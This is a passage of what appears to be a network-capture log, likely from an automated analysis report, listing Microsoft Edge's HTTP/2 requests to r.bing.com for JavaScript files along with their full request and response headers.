user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

content-length: 2006
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: kbJdHNWIQlOa0AZdH1dRWQ==
last-modified: Tue, 24 Sep 2024 05:39:48 GMT
etag: 0x8DCDC5B4DE1BE88
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: dc8b9f86-c01e-0043-1bb8-17c079000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=82749
expires: Fri, 18 Oct 2024 20:02:59 GMT
date: Thu, 17 Oct 2024 21:03:50 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.a6777b5c.1729199030.9ac698b
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/pYx84E5QxKsDa_GCjDkQj38YO0k.br.js

msedge.exe

Remote address:

92.123.128.167:443

Request

GET /rp/pYx84E5QxKsDa_GCjDkQj38YO0k.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

last-modified: Tue, 24 Sep 2024 07:01:35 GMT
etag: 0x8DCDC66BA62EF4C
content-length: 1737
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: MH86c+Cw/X3ukvifBPzDeQ==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: de88614f-201e-002f-3db5-1c6baa000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=99758
expires: Sat, 19 Oct 2024 00:46:28 GMT
date: Thu, 17 Oct 2024 21:03:50 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.a6777b5c.1729199030.9ac698c
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/7iVUkp_QNKYQoVs0zBrZVocZL9c.br.js

msedge.exe

Remote address:

92.123.128.167:443

Request

GET /rp/7iVUkp_QNKYQoVs0zBrZVocZL9c.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

last-modified: Tue, 24 Sep 2024 05:52:07 GMT
etag: 0x8DCDC5D067E2917
content-length: 1934
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: GLaLmYi6VgbtR9vVQrFDIA==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 2de0e7dd-301e-0074-05f1-176cd6000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=76954
expires: Fri, 18 Oct 2024 18:26:24 GMT
date: Thu, 17 Oct 2024 21:03:50 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.a6777b5c.1729199030.9ac698e
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/y9cMttd-SwSaYuiqhqk701fxHs0.br.js

msedge.exe

Remote address:

92.123.128.167:443

Request

GET /rp/y9cMttd-SwSaYuiqhqk701fxHs0.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

last-modified: Tue, 24 Sep 2024 07:14:36 GMT
etag: 0x8DCDC688C17C78B
content-length: 1981
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: cjiiNPsYSsV3a8xOZhlPWw==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: e18d7a90-701e-0037-6b28-16463f000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=247002
expires: Sun, 20 Oct 2024 17:40:32 GMT
date: Thu, 17 Oct 2024 21:03:50 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.a6777b5c.1729199030.9ac698f
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/7LkHIwasTuL6tufzeF3vEaazAxw.br.js

msedge.exe

Remote address:

92.123.128.167:443

Request

GET /rp/7LkHIwasTuL6tufzeF3vEaazAxw.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

last-modified: Tue, 24 Sep 2024 05:51:54 GMT
etag: 0x8DCDC5CFE789590
content-length: 1462
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: YsxphTS643oFtIWrwjg5mA==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 6a9070a5-501e-0020-2ef1-17865c000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=83051
expires: Fri, 18 Oct 2024 20:08:01 GMT
date: Thu, 17 Oct 2024 21:03:50 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.a6777b5c.1729199030.9ac6991
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/MCwdqGFTwqu20jt3177s57V4wZk.br.js

msedge.exe

Remote address:

92.123.128.167:443

Request

GET /rp/MCwdqGFTwqu20jt3177s57V4wZk.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

last-modified: Tue, 24 Sep 2024 06:14:44 GMT
etag: 0x8DCDC602EF80ACF
content-length: 92
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: 6CIgOkytlGCbuuRvU1ESHg==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: b826b2dc-201e-0024-251c-1573de000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=243262
expires: Sun, 20 Oct 2024 16:38:12 GMT
date: Thu, 17 Oct 2024 21:03:50 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.a6777b5c.1729199030.9ac6992
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/aE8OMYmbAbtZuaBhCiFbNjif4c8.br.js

msedge.exe

Remote address:

92.123.128.167:443

Request

GET /rp/aE8OMYmbAbtZuaBhCiFbNjif4c8.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

content-length: 825
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: xdMdwJzuTSDWyEVHBVX+Ig==
last-modified: Tue, 24 Sep 2024 06:38:13 GMT
etag: 0x8DCDC6376E84479
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 09ffc4b5-201e-0024-4c98-1673de000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=380811
expires: Tue, 22 Oct 2024 06:50:41 GMT
date: Thu, 17 Oct 2024 21:03:50 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.a6777b5c.1729199030.9ac6993
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/ehd9DVTDg25XG1HgnAeMa17fMkw.br.js

msedge.exe

Remote address:

92.123.128.167:443

Request

GET /rp/ehd9DVTDg25XG1HgnAeMa17fMkw.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

last-modified: Tue, 24 Sep 2024 06:44:47 GMT
etag: 0x8DCDC6461B8EC87
content-length: 2856
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: NHuJgX+3GPNWYAgf/6GFAw==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: b55a626f-401e-0052-1286-18f762000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=332871
expires: Mon, 21 Oct 2024 17:31:41 GMT
date: Thu, 17 Oct 2024 21:03:50 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.a6777b5c.1729199030.9ac6994
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/QtJVX2BWG_pKK8Kg_EqULgkLsrk.br.js

msedge.exe

Remote address:

92.123.128.167:443

Request

GET /rp/QtJVX2BWG_pKK8Kg_EqULgkLsrk.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

content-length: 2195
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: xzlDkts2z/oygJ5ccX8zrQ==
last-modified: Tue, 24 Sep 2024 06:22:23 GMT
etag: 0x8DCDC61407573E4
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: fbd8907d-d01e-005c-1864-151b69000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=122197
expires: Sat, 19 Oct 2024 07:00:27 GMT
date: Thu, 17 Oct 2024 21:03:50 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.a6777b5c.1729199030.9ac699b
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/DUK18cY3cfD0zk-_nBEv4bFX75k.br.js

msedge.exe

Remote address:

92.123.128.167:443

Request

GET /rp/DUK18cY3cfD0zk-_nBEv4bFX75k.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

last-modified: Tue, 24 Sep 2024 06:01:44 GMT
etag: 0x8DCDC5E5E0E9687
content-type: text/javascript; charset=utf-8
content-md5: DwfcvNDY4cp/xtPCgBZRvg==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: bd92789c-801e-0000-345f-16ea90000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
content-encoding: gzip
content-length: 2303
vary: Accept-Encoding
cache-control: public, no-transform, max-age=237059
expires: Sun, 20 Oct 2024 14:54:49 GMT
date: Thu, 17 Oct 2024 21:03:50 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.a6777b5c.1729199030.9ac699c
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/Ivjrtaa9JhEJURQVZcs0_qKi1j0.br.js

msedge.exe

Remote address:

92.123.128.167:443

Request

GET /rp/Ivjrtaa9JhEJURQVZcs0_qKi1j0.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

last-modified: Tue, 24 Sep 2024 06:10:05 GMT
etag: 0x8DCDC5F88CB30A2
content-type: text/javascript; charset=utf-8
content-md5: Fce2jR7sZtHS19v+4jpjKg==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 2f71ab69-701e-0015-4358-152809000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
content-encoding: gzip
content-length: 11250
vary: Accept-Encoding
cache-control: public, no-transform, max-age=344859
expires: Mon, 21 Oct 2024 20:51:29 GMT
date: Thu, 17 Oct 2024 21:03:50 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.a6777b5c.1729199030.9ac699d
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/f2tIUlGO-Vx9ewtZM2JDtvorAmk.br.js

msedge.exe

Remote address:

92.123.128.167:443

Request

GET /rp/f2tIUlGO-Vx9ewtZM2JDtvorAmk.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

content-type: text/javascript; charset=utf-8
content-md5: fKmbsetZ77DEthV6y8OhTg==
last-modified: Tue, 24 Sep 2024 06:45:39 GMT
etag: 0x8DCDC6480D8A1ED
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: bf84d6bf-701e-0037-1199-16463f000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
content-encoding: gzip
content-length: 1259
vary: Accept-Encoding
cache-control: public, no-transform, max-age=80477
expires: Fri, 18 Oct 2024 19:25:07 GMT
date: Thu, 17 Oct 2024 21:03:50 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.a6777b5c.1729199030.9ac6a20
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/V1IVR9mHl-wmfpaYvxgykvCITqg.br.js

msedge.exe

Remote address:

92.123.128.167:443

Request

GET /rp/V1IVR9mHl-wmfpaYvxgykvCITqg.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
origin: https://www.bing.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
dnt: 1
accept: */*
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

last-modified: Thu, 10 Oct 2024 18:11:53 GMT
etag: 0x8DCE9570503E0CA
content-length: 6590
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: qahV8hCphevIGCq6dnROeg==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 320dfa75-d01e-0031-3e0f-1cb147000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=323909
expires: Mon, 21 Oct 2024 15:02:23 GMT
date: Thu, 17 Oct 2024 21:03:54 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.a6777b5c.1729199034.9ac8bb1
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/Bb0jjwco4ZJEBGvupFSH5c_T008.br.js

msedge.exe

Remote address:

92.123.128.167:443

Request

GET /rp/Bb0jjwco4ZJEBGvupFSH5c_T008.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

content-length: 163
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: ntZPQ0NwSl+Oa0DwbVn/yQ==
last-modified: Tue, 24 Sep 2024 05:58:32 GMT
etag: 0x8DCDC5DEBC36F3E
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 6ca70dc1-f01e-0004-5691-181f12000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=355114
expires: Mon, 21 Oct 2024 23:42:52 GMT
date: Thu, 17 Oct 2024 21:04:18 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.a6777b5c.1729199058.9ad54d9
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/DtSJRclxNUnEHeMSx9SgmOkIQKI.br.js

msedge.exe

Remote address:

92.123.128.167:443

Request

GET /rp/DtSJRclxNUnEHeMSx9SgmOkIQKI.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

last-modified: Tue, 24 Sep 2024 05:53:13 GMT
etag: 0x8DCDC5D2D7EB1BF
content-length: 320
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: DXeqkh2i/zZTwJ5wkgDOdw==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: b1a93f5f-601e-0067-0cc7-175937000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=230771
expires: Sun, 20 Oct 2024 13:10:29 GMT
date: Thu, 17 Oct 2024 21:04:18 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.a6777b5c.1729199058.9ad54db
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/8aj_I6fSAQ2HauP0CPPAfDwa2j8.br.js

msedge.exe

Remote address:

92.123.128.167:443

Request

GET /rp/8aj_I6fSAQ2HauP0CPPAfDwa2j8.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

last-modified: Tue, 24 Sep 2024 12:21:13 GMT
etag: 0x8DCDC9361C2A9CB
content-length: 305
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: U36iFcyu8u4qPEEyCl6EBQ==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 8e0dc95f-701e-0015-74c6-152809000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=4364
expires: Thu, 17 Oct 2024 22:17:02 GMT
date: Thu, 17 Oct 2024 21:04:18 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.a6777b5c.1729199058.9ad54da
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/6juFsmmZTw2skj7CvpgreXtsgqM.br.js

msedge.exe

Remote address:

92.123.128.167:443

Request

GET /rp/6juFsmmZTw2skj7CvpgreXtsgqM.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

content-length: 450
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: rtxvs37lrHH+iqrm7oyJaw==
last-modified: Tue, 24 Sep 2024 06:21:57 GMT
etag: 0x8DCDC61311C1C65
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 6fd789d0-401e-003f-6655-175d4c000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=163947
expires: Sat, 19 Oct 2024 18:36:45 GMT
date: Thu, 17 Oct 2024 21:04:18 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.a6777b5c.1729199058.9ad5503
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/CuoJ-XSESmq5e-S0atX4JdNgEbQ.br.js

msedge.exe

Remote address:

92.123.128.167:443

Request

GET /rp/CuoJ-XSESmq5e-S0atX4JdNgEbQ.br.js HTTP/2.0
host: r.bing.com
